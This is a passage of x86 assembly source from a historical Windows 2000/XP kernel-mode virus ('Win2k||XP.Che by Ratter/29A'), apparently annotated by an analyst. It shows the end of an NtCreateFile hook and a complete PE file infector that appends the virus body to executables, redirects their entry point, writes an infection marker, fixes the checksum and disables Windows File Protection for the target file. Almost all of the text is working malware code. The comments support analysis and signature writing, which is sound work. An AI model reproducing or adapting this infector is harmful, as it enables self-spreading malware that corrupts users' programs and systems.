push -1
mov eax, 12345678h
allocate_virtual_memory equ $-4
call eax
test eax, eax
jnz new_ntcreatefile_infect_end
mov edx, dword ptr [base_address]
lea eax, [edx+1028+(infect_routine-driver_entry)]
mov dword ptr [edx], eax
lea edi, [edx+1024+4]
push esi
lea esi, [esi+driver_entry] ; copy the to user-mode
push che_end-driver_entry
pop ecx
rep movsb
pop esi
lea edi, [edx+12]
mov ebx, 1016
xor edx, edx
mov eax, dword ptr [ebp+4+cPushad+4+8]
mov ecx, dword ptr [eax+4]
jecxz new_createfile_infect_no_roothandle
sub edi, 8
add ebx, 8
lea eax, [pobject]
push edx
push eax
push edx
push edx
push edx
push ecx ; roothandle
mov eax, 12345678h
reference_object_by_handle equ $-4
call eax
test eax, eax
jnz new_ntcreatefile_infect_end_free_mem
lea eax, [bytes_returned]
push eax
push ebx
push edi ; allocated mem in the process
push dword ptr [pobject]
mov eax, 12345678h
query_name_string equ $-4
call eax
push eax
push dword ptr [pobject]
mov eax, 12345678h
dereference_object equ $-4
call eax
pop eax
test eax, eax
jnz new_ntcreatefile_infect_end_free_mem
movzx ecx, word ptr [edi]
lea edi, [edi+ecx+8]
sub ebx, ecx
sub ebx, 2
jl new_ntcreatefile_infect_end_free_mem
xor eax, eax
mov al, '\'
stosw
new_createfile_infect_no_roothandle:
; now copy the normal name to the buffer
mov eax, dword ptr [ebp+4+cPushad+4+8]
mov edx, dword ptr [eax+8]
movzx ecx, word ptr [edx]
sub ebx, ecx
jle new_ntcreatefile_infect_end_free_mem
shr ecx, 1
push esi
mov esi, dword ptr [edx+4]
rep movsw
pop esi
mov eax, 12345678h
kernel_callback_table equ $-4
mov edx, [base_address]
sub edx, eax
shr edx, 2
lea ecx, [ecx_on_return]
push ecx
lea eax, [edx_on_return]
push eax
push 0
lea eax, [edx_on_return]
push eax ; stack start
push edx
mov eax, 12345678h
ke_user_mode_callback equ $-4
call eax
new_ntcreatefile_infect_end_free_mem:
push MEM_DECOMMIT
lea eax, [allocation_size]
push eax
lea eax, [base_address]
push eax
push -1
mov eax, 12345678h
free_virtual_memory equ $-4
call eax
new_ntcreatefile_infect_end:
leave
; locked
new_ntcreatefile_end_unlock:
btr dword ptr [esi+_lock_], 0
new_ntcreatefile_end:
popad
mov eax, 12345678h
old_ntcreatefile equ $-4
jmp eax
_lock_ dd 0
new_ntcreatefile endp
; infection routine based on Billy Belcebu Aztec virus
; well the code is not very nice, but it worx fine and i have
; better things to do than coding infection routines :)
;-----------------------------------------------------------------------
; infect_routine -- PE file infector (payload of a historical Win2k/XP
; kernel-mode virus; the comments below are analyst notes describing
; what the visible code does).
;
; Runs in user mode: the NtCreateFile hook that precedes this listing
; copies the body to a user-mode buffer and reaches it through
; KeUserModeCallback (that hook starts before this listing, so only its
; tail is visible). The code is delta-relative: esi = load delta and
; every global is addressed as [esi+label].
;
; In:   a UTF-16 path that the hook built 1024 bytes below driver_entry;
;       it must start with "\??\" (the NT object-manager prefix) or the
;       routine returns immediately.
; Out:  nothing is returned. On success che_end-driver_entry bytes are
;       appended to the last section of the file named by that path,
;       AddressOfEntryPoint is pointed at the appended code, and a marker
;       is written into OptionalHeader.Win32VersionValue.
; Uses: the API slots (createfilew .. getfilesize) at the end of this
;       proc, which are populated by code outside this listing.
; Cleanup: the infect_routine_end_* labels form a fall-through chain
;       (unmap -> close mapping -> close file -> restore attributes).
;       The SEH frame jumps straight to infect_routine_end, so a fault
;       inside the body skips that chain: handles stay open and the
;       original attributes are not restored.
;-----------------------------------------------------------------------
infect_routine proc near
local file_name:DWORD         ; UTF-16 path, past the "\??\" prefix
local file_attribz:DWORD      ; original attributes, restored on exit
local file_handle:DWORD
local file_size:DWORD         ; low dword only; files with a high dword are skipped
local file_size_high:DWORD
local mapping_handle:DWORD
local map_address:DWORD
local new_file_size:DWORD     ; size after appending, rounded by _align_
pushad
; any exception -> infect_routine_end (no cleanup chain)
@SEH_SetupFrame <jmp infect_routine_end>
; eax = load delta (macro defined outside this listing)
@gimme_delta
xchg eax, esi                              ; esi = delta for all [esi+label] references
and dword ptr [esi+_lock_], 0              ; clears the lock word of this (esi-relative, user-mode) copy
lea edx, [esi+driver_entry-1024+8]         ; name buffer the hook filled before copying the body
cmp dword ptr [edx], 003f005ch             ; UTF-16 '\' '?'
jnz infect_routine_end
cmp dword ptr [edx+4], 005c003fh           ; UTF-16 '?' '\'  -> "\??\" prefix required
jnz infect_routine_end
add edx, 8                                 ; skip the 4-character prefix
mov dword ptr [file_name], edx
push edx                                   ; second copy is popped back into edx below
push edx
call dword ptr [esi+getfileattributes]     ; failure (-1) is not checked; -1 is then "restored" at exit
mov dword ptr [file_attribz], eax
pop edx
call sfp_exception                         ; edx = path; see sfp_exception below
push 80h                                   ; FILE_ATTRIBUTE_NORMAL (clears read-only etc.)
push edx
call dword ptr [esi+setfileattributes]
call open_file                             ; CreateFileW, read/write, no sharing
inc eax                                    ; INVALID_HANDLE_VALUE (-1) -> 0
jz infect_routine_end_restore_attribz
dec eax
mov dword ptr [file_handle], eax
lea edx, [file_size_high]
push edx
push eax
call dword ptr [esi+getfilesize]
mov dword ptr [file_size], eax
cmp dword ptr [file_size_high], 0
jnz infect_routine_end_closehandle         ; give up on files >= 4 GB
xchg eax, ecx                              ; ecx = size for create_mapping / map_file
push ecx
call create_mapping                        ; first mapping: the file at its current size
pop ecx
test eax, eax
jz infect_routine_end_closehandle
mov dword ptr [mapping_handle], eax
call map_file
test eax, eax
jz infect_routine_end_close_mapping
mov dword ptr [map_address], eax
cmp word ptr [eax], "ZM"                   ; IMAGE_DOS_SIGNATURE ("MZ" on disk)
jnz infect_routine_end_unmap_file
mov ebx, dword ptr [eax+3ch]               ; e_lfanew (not bounds-checked against the view)
add ebx, eax                               ; ebx = PE header
cmp dword ptr [ebx], "EP"                  ; IMAGE_NT_SIGNATURE ("PE" on disk)
jnz infect_routine_end_unmap_file
; infection marker: OptionalHeader.Win32VersionValue (PE+4Ch). By the
; same literal convention as "ZM"/"EP" above the on-disk bytes are
; 'a','t','a','r' -- confirm on a sample before using it as a signature.
cmp dword ptr [ebx+4ch], "rata"
jz infect_routine_end_unmap_file           ; already infected
push dword ptr [ebx+3ch]                   ; OptionalHeader.FileAlignment, popped into ecx below
push eax
call dword ptr [esi+unmapviewoffile]       ; drop the first view; the file is re-mapped larger
push dword ptr [mapping_handle]
call dword ptr [esi+closehandle]
pop ecx                                    ; ecx = FileAlignment (0 here would fault in _align_)
mov eax, dword ptr [file_size]
add eax, che_end-driver_entry              ; old size + body size
call _align_                               ; round up to FileAlignment (see _align_ for its edge case)
xchg eax, ecx
mov dword ptr [new_file_size], ecx
push ecx
call create_mapping                        ; a mapping larger than the file extends it
pop ecx
test eax, eax
jz infect_routine_end_closehandle
mov dword ptr [mapping_handle], eax
call map_file
test eax, eax
jz infect_routine_end_close_mapping
mov dword ptr [map_address], eax
mov ebx, dword ptr [eax+3ch]
add ebx, eax                               ; ebx = PE header
mov edi, ebx                               ; edi = PE header (kept for the optional-header fields)
movzx eax, word ptr [edi+06h]              ; FileHeader.NumberOfSections
dec eax
imul eax, eax, 28h                         ; (n-1) * sizeof(IMAGE_SECTION_HEADER)
add ebx, eax
add ebx, 78h                               ; PE+78h = start of the data directories (PE32 layout assumed)
mov edx, dword ptr [edi+74h]               ; OptionalHeader.NumberOfRvaAndSizes
shl edx, 3
add ebx, edx                               ; ebx = last section header
; SizeOfOptionalHeader is never read, so a non-standard optional header
; size would mislocate the section table.
mov eax, dword ptr [edi+28h]               ; OptionalHeader.AddressOfEntryPoint
mov dword ptr [esi+host_start_addr], eax   ; original entry, stored in the body (host_start_addr is outside this listing)
mov edx, dword ptr [ebx+10h]               ; last section SizeOfRawData
mov eax, edx
add edx, dword ptr [ebx+14h]               ; + PointerToRawData = file offset where the body is written
push edx
add eax, dword ptr [ebx+0ch]               ; + VirtualAddress = RVA of the appended body
mov dword ptr [edi+28h], eax               ; new AddressOfEntryPoint
mov dword ptr [esi+new_eip], eax           ; new_eip is outside this listing
mov eax, dword ptr [ebx+10h]
add eax, che_end-driver_entry
mov ecx, dword ptr [edi+3ch]               ; FileAlignment
call _align_
mov dword ptr [ebx+10h], eax               ; new SizeOfRawData
mov dword ptr [ebx+08h], eax               ; new VirtualSize (same value)
add eax, dword ptr [ebx+0ch]
mov dword ptr [edi+50h], eax               ; new SizeOfImage (FileAlignment-rounded, not SectionAlignment-rounded)
or dword ptr [ebx+24h], 0A0000020h         ; Characteristics |= CNT_CODE | MEM_EXECUTE | MEM_WRITE
mov dword ptr [edi+4ch], "rata"            ; write the marker (Win32VersionValue)
pop edi
add edi, dword ptr [map_address]           ; edi = view base + file offset of the body
push esi
lea esi, [esi+driver_entry]
mov ecx, che_end-driver_entry
rep movsb                                  ; append the body (driver_entry .. che_end)
pop esi
call count_correct_checksum                ; fix OptionalHeader.CheckSum
infect_routine_end_unmap_file:
push dword ptr [map_address]
call dword ptr [esi+unmapviewoffile]
infect_routine_end_close_mapping:
push dword ptr [mapping_handle]
call dword ptr [esi+closehandle]
infect_routine_end_closehandle:
push dword ptr [file_handle]
call dword ptr [esi+closehandle]
infect_routine_end_restore_attribz:
push dword ptr [file_attribz]
push dword ptr [file_name]
call dword ptr [esi+setfileattributes]
infect_routine_end:
@SEH_RemoveFrame
popad
leave                                      ; tears down the frame MASM builds for the LOCAL directives
retn
;--- local helpers: near calls, esi = delta, locals reached through ebp ---
; open_file: CreateFileW(file_name, GENERIC_READ|GENERIC_WRITE, 0, NULL,
; OPEN_EXISTING, 0, NULL). eax = handle or INVALID_HANDLE_VALUE.
open_file:
xor eax, eax
push eax                                   ; hTemplateFile
push eax                                   ; dwFlagsAndAttributes
push OPEN_EXISTING
push eax                                   ; lpSecurityAttributes
push eax                                   ; dwShareMode = 0 (exclusive)
push GENERIC_READ or GENERIC_WRITE
push dword ptr [file_name]
call dword ptr [esi+createfilew]
retn
; create_mapping: CreateFileMapping(file_handle, NULL, PAGE_READWRITE,
; 0, ecx, NULL). In: ecx = size (low dword). eax = mapping handle or 0.
create_mapping:
xor eax, eax
push eax                                   ; lpName
push ecx                                   ; dwMaximumSizeLow
push eax                                   ; dwMaximumSizeHigh
push PAGE_READWRITE
push eax                                   ; lpAttributes
push dword ptr [file_handle]
call dword ptr [esi+createfilemapping]
retn
; map_file: MapViewOfFile(mapping_handle, FILE_MAP_READ|FILE_MAP_WRITE,
; 0, 0, ecx). In: ecx = bytes to map. eax = view base or 0.
map_file:
xor eax, eax
push ecx                                   ; dwNumberOfBytesToMap
push eax                                   ; dwFileOffsetLow
push eax                                   ; dwFileOffsetHigh
push FILE_MAP_READ or FILE_MAP_WRITE
push dword ptr [mapping_handle]
call dword ptr [esi+mapviewoffile]
retn
; _align_: eax = eax rounded up to a multiple of ecx (unsigned).
; Edge case: when eax is already a multiple, edx = 0 and a full ecx is
; still added, so the result is one alignment unit larger than a plain
; round-up. ecx = 0 raises #DE (caught by the SEH frame above).
; Preserves edx; clobbers ecx and flags.
_align_:
push edx
xor edx, edx                               ; edx:eax / ecx
push eax
div ecx
pop eax
sub ecx, edx                               ; ecx = alignment - remainder
add eax, ecx
pop edx
retn
; count_correct_checksum: recomputes the PE checksum of the mapped view
; through imagehlp.dll. The export is resolved by hash (0cf6736bbh) via
; gimme_api, which is outside this listing; the call shape
; (base, length, &headersum, &checksum) matches CheckSumMappedFile, with
; the last pointer aimed directly at OptionalHeader.CheckSum so the header
; is patched in place -- presumably that export, verify in a debugger.
; Preserves all registers (pushad/popad).
count_correct_checksum:
pushad
@pushsz "imagehlp.dll"
call dword ptr [esi+loadlibrary]
test eax, eax
jz count_correct_checksum_end
xchg eax, ebx                              ; ebx = module base (how gimme_api reads it is not visible here)
push 0cf6736bbh                            ; hashed export name
call gimme_api
test eax, eax
jz count_correct_checksum_end              ; NOTE: imagehlp.dll is not freed on this path
xchg eax, edi                              ; edi = resolved export
mov edx, dword ptr [map_address]
mov eax, dword ptr [edx+3ch]
add eax, edx
lea eax, [eax+58h]                         ; &OptionalHeader.CheckSum (PE+58h)
push eax                                   ; CheckSum (out)
; HeaderSum (out), scratch dword
@pushvar <dd ?>
push dword ptr [new_file_size]             ; FileLength
push edx                                   ; BaseAddress
call edi
push ebx
call dword ptr [esi+freelibrary]
count_correct_checksum_end:
popad
retn
; sfp_exception: loads sfc_os.dll and calls its ordinal 5 as (0, path, -1).
; That argument shape is the one reported in the literature for the
; undocumented SfcFileException (suppress Windows File Protection for a
; file); the ordinal is not named here, confirm against the target build.
; In: edx = path. Preserves all registers.
sfp_exception:
pushad
mov edi, edx                               ; edi = path, survives the calls below
@pushsz "sfc_os.dll"
call dword ptr [esi+loadlibrary]
test eax, eax
jz sfp_exception_end
xchg eax, ebx                              ; ebx = module handle
push 5                                     ; ordinal 5
push ebx
call dword ptr [esi+getprocaddress]
test eax, eax
jz sfp_exception_end_free_library
push -1
push edi
push 0
call eax                                   ; ordinal5(0, path, -1)
sfp_exception_end_free_library:
push ebx
call dword ptr [esi+freelibrary]
sfp_exception_end:
popad
retn
; API slots referenced as [esi+name]. Left uninitialized (?) here and
; populated by code outside this listing. They sit inside the copied
; body (before che_end), so every infected file carries them as well.
createfilew dd ?
closehandle dd ?
loadlibrary dd ?
getprocaddress dd ?
freelibrary dd ?
getfileattributes dd ?
setfileattributes dd ?
createfilemapping dd ?
mapviewoffile dd ?
unmapviewoffile dd ?
getfilesize dd ?
infect_routine endp
; Identification strings carried in the body (each preceded by a 0 byte).
; They lie before che_end, so they are appended to every infected file
; along with the code; together with the marker written into
; OptionalHeader.Win32VersionValue by infect_routine they are usable as a
; static signature for this family.
db 0, " Win2k||XP.Che by Ratter/29A ", 0
db 0, "_-=Dedicated to Trent Reznor=-_", 0
db 0, " In Czech Republic, 2003 ", 0
che_end equ $                              ; end of the copied/appended body; size = che_end-driver_entry
.code
; host_start: stub host code placed after che_end, so it is not part of
; the body that gets appended to infected files. The image entry point
; is driver_entry (named by `end driver_entry`; it is outside this
; listing). This stub returns STATUS_DRIVER_INTERNAL_ERROR; `retn 8`
; pops the two stdcall arguments a DriverEntry receives (by convention
; DriverObject and RegistryPath). How control reaches it is not visible
; in this listing.
host_start:
mov eax, STATUS_DRIVER_INTERNAL_ERROR
retn 8
end driver_entry